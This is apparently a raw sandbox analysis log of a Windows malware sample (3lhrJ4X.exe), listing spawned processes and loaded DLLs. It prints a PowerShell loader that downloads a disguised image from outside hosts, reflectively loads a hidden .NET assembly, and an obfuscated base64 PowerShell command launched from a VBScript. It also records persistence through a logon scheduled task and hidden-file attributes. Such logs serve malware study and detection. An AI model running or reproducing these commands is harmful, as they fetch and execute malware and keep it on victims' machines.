                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.knncbbp/sdaolnwod/fwqfwrew/ewqrwfwqf/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -exec
                  Source: unknownProcess created: C:\Windows\System32\rundll32.exe "C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\"
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "Msbuild"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "Msbuild" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                  Source: C:\Windows\SysWOW64\schtasks.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: unknownProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                  Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                  Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                  Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                  Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                  Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                  Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                  Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                  Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                  Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                  Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                  Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                  Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"
                  Source: C:\Windows\SysWOW64\attrib.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeProcess created: C:\Windows\System32\cmd.exe cmd.exe /c 67784c48226c6.vbsJump to behavior
                  Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\IXP000.TMP\67784c48226c6.vbs" Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$dosigo = 'WwBO$GU$d$$u$FM$ZQBy$HY$aQBj$GU$U$Bv$Gk$bgB0$E0$YQBu$GE$ZwBl$HI$XQ$6$Do$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$$g$D0$I$Bb$E4$ZQB0$C4$UwBl$GM$dQBy$Gk$d$B5$F$$cgBv$HQ$bwBj$G8$b$BU$Hk$c$Bl$F0$Og$6$FQ$b$Bz$DE$Mg$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgB1$G4$YwB0$Gk$bwBu$C$$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$RgBy$G8$bQBM$Gk$bgBr$HM$I$B7$C$$c$Bh$HI$YQBt$C$$K$Bb$HM$d$By$Gk$bgBn$Fs$XQBd$CQ$b$Bp$G4$awBz$Ck$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$B3$GU$YgBD$Gw$aQBl$G4$d$$g$D0$I$BO$GU$dw$t$E8$YgBq$GU$YwB0$C$$UwB5$HM$d$Bl$G0$LgBO$GU$d$$u$Fc$ZQBi$EM$b$Bp$GU$bgB0$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$C$$PQ$g$Ec$ZQB0$C0$UgBh$G4$Z$Bv$G0$I$$t$Ek$bgBw$HU$d$BP$GI$agBl$GM$d$$g$CQ$b$Bp$G4$awBz$C$$LQBD$G8$dQBu$HQ$I$$k$Gw$aQBu$Gs$cw$u$Ew$ZQBu$Gc$d$Bo$Ds$I$$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$ZgBv$HI$ZQBh$GM$a$$g$Cg$J$Bs$Gk$bgBr$C$$aQBu$C$$J$Bz$Gg$dQBm$GY$b$Bl$GQ$T$Bp$G4$awBz$Ck$I$B7$C$$d$By$Hk$I$B7$C$$cgBl$HQ$dQBy$G4$I$$k$Hc$ZQBi$EM$b$Bp$GU$bgB0$C4$R$Bv$Hc$bgBs$G8$YQBk$EQ$YQB0$GE$K$$k$Gw$aQBu$Gs$KQ$g$H0$I$Bj$GE$d$Bj$Gg$I$B7$C$$YwBv$G4$d$Bp$G4$dQBl$C$$fQ$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$By$GU$d$B1$HI$bg$g$CQ$bgB1$Gw$b$$g$H0$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$Gw$aQBu$Gs$cw$g$D0$I$B$$Cg$JwBo$HQ$d$Bw$HM$Og$v$C8$YgBp$HQ$YgB1$GM$awBl$HQ$LgBv$HI$Zw$v$Gc$a$Bq$Gs$awBr$Gs$awBr$Gs$aw$v$HQ$Z$By$GQ$cgBl$GU$cwB0$C8$Z$Bv$Hc$bgBs$G8$YQBk$HM$LwBp$G0$Zw$u$Go$c$Bn$D8$NQ$z$Dc$Ng$x$DI$Jw$s$C$$JwBo$HQ$d$Bw$HM$Og$v$C8$cgBh$Hc$LgBn$Gk$d$Bo$HU$YgB1$HM$ZQBy$GM$bwBu$HQ$ZQBu$HQ$LgBj$G8$bQ$v$Gc$bQBl$GQ$dQBz$GE$MQ$z$DU$LwBu$GE$bgBv$C8$cgBl$GY$cw$v$Gg$ZQBh$GQ$cw$v$G0$YQBp$G4$LwBu$GU$dwBf$Gk$bQBn$DE$Mg$z$C4$agBw$Gc$Jw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$J$Bp$G0$YQBn$GU$QgB5$HQ$ZQBz$C$$PQ$g$EQ$bwB3$G4$b$Bv$GE$Z$BE$GE$d$Bh$EY$cgBv$G0$T$Bp$G4$awBz$C$$J$Bs$Gk$bgBr$HM$Ow$N$$o$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$Bp$GY$I$$o$CQ$aQBt$GE$ZwBl$EI$eQB0$GU$cw$g$C0$bgBl$C$$J$Bu$HU$b$Bs$Ck$I$B7$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$g$D0$I$Bb$FM$eQBz$HQ$ZQBt$C4$V$Bl$Hg$d$$u$EU$bgBj$G8$Z$Bp$G4$ZwBd$Do$OgBV$FQ$Rg$4$C4$RwBl$HQ$UwB0$HI$aQBu$Gc$K$$k$Gk$bQBh$Gc$ZQBC$Hk$d$Bl$HM$KQ$7$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$I$$9$C$$Jw$8$Dw$QgBB$FM$RQ$2$DQ$XwBT$FQ$QQBS$FQ$Pg$+$Cc$Ow$g$CQ$ZQBu$GQ$RgBs$GE$Zw$g$D0$I$$n$Dw$P$BC$EE$UwBF$DY$N$Bf$EU$TgBE$D4$Pg$n$Ds$I$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$9$C$$J$Bp$G0$YQBn$GU$V$Bl$Hg$d$$u$Ek$bgBk$GU$e$BP$GY$K$$k$HM$d$Bh$HI$d$BG$Gw$YQBn$Ck$Ow$g$$0$Cg$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$k$GU$bgBk$Ek$bgBk$GU$e$$g$D0$I$$k$Gk$bQBh$Gc$ZQBU$GU$e$B0$C4$SQBu$GQ$ZQB4$E8$Zg$o$CQ$ZQBu$GQ$RgBs$GE$Zw$p$Ds$DQ$K$C$$I$$g$C$$I$$g$C$$I$$g$C$$I$$g$C$$aQBm$C$$K$$k$HM$d$Bh$HI$d$BJ$G4$Z$Bl$Hg$I$$t$Gc$ZQ$g$D$$I$$t$GE$bgBk$C$$J$Bl$G4$Z$BJ$G4$Z$Bl$Hg$I$$t$Gc$d$$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$p$C$$ew$g$CQ$cwB0$GE$cgB0$Ek$bgBk$GU$e$$g$Cs$PQ$g$CQ$cwB0$GE$cgB0$EY$b$Bh$Gc$LgBM$GU$bgBn$HQ$a$$7$C$$DQ$K$CJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12 function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $shuffledLinks = Get-Random -InputObject $links -Count $links.Length; foreach ($link in $shuffledLinks) { try { return $webClient.DownloadData($link) } catch { continue } }; return $null }; $links = @('https://bitbucket.org/ghjkkkkkkkk/tdrdreest/downloads/img.jpg?537612', 'https://raw.githubusercontent.com/gmedusa135/nano/refs/heads/main/new_img123.jpg'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $EncodedText =[Convert]::ToBase64String($Bytes); $commandBytes = [System.Convert]::FromBase64String($base64Command); $text = $EncodedText; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $EncodedText =[Convert]::ToBase64String($Bytes); $compressedByteArray = Get-CompressedByteArray -byteArray $encText $type = $loadedAssembly.GetType('testpowershell.Hoaaaaaasdme'); $EncodedText =[Convert]::ToBase64String($Bytes); $method = $type.GetMethod('lfsgeddddddda').Invoke($null, [object[]] (' txt.knncbbp/sdaolnwod/fwqfwrew/ewqrwfwqf/gro.tekcubtib', '0', 'StartupName', 'Msbuild', '0'))}}" .exe -windowstyle hidden -execJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "schtasks" /Query /TN "Msbuild"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /create /f /sc onlogon /tn "Msbuild" /tr "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess created: C:\Windows\SysWOW64\attrib.exe "attrib.exe" +h +s "C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe"Jump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeSection loaded: cabinet.dllJump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeSection loaded: feclient.dllJump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeSection loaded: textinputframework.dllJump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeSection loaded: coreuicomponents.dllJump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeSection loaded: ntmarta.dllJump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeSection loaded: coremessaging.dllJump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeSection loaded: textshaping.dllJump to behavior
                  Source: C:\Users\user\Desktop\3lhrJ4X.exeSection loaded: advpack.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: policymanager.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: msvcp110_win.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: pcacli.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\cmd.exeSection loaded: sfc_os.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
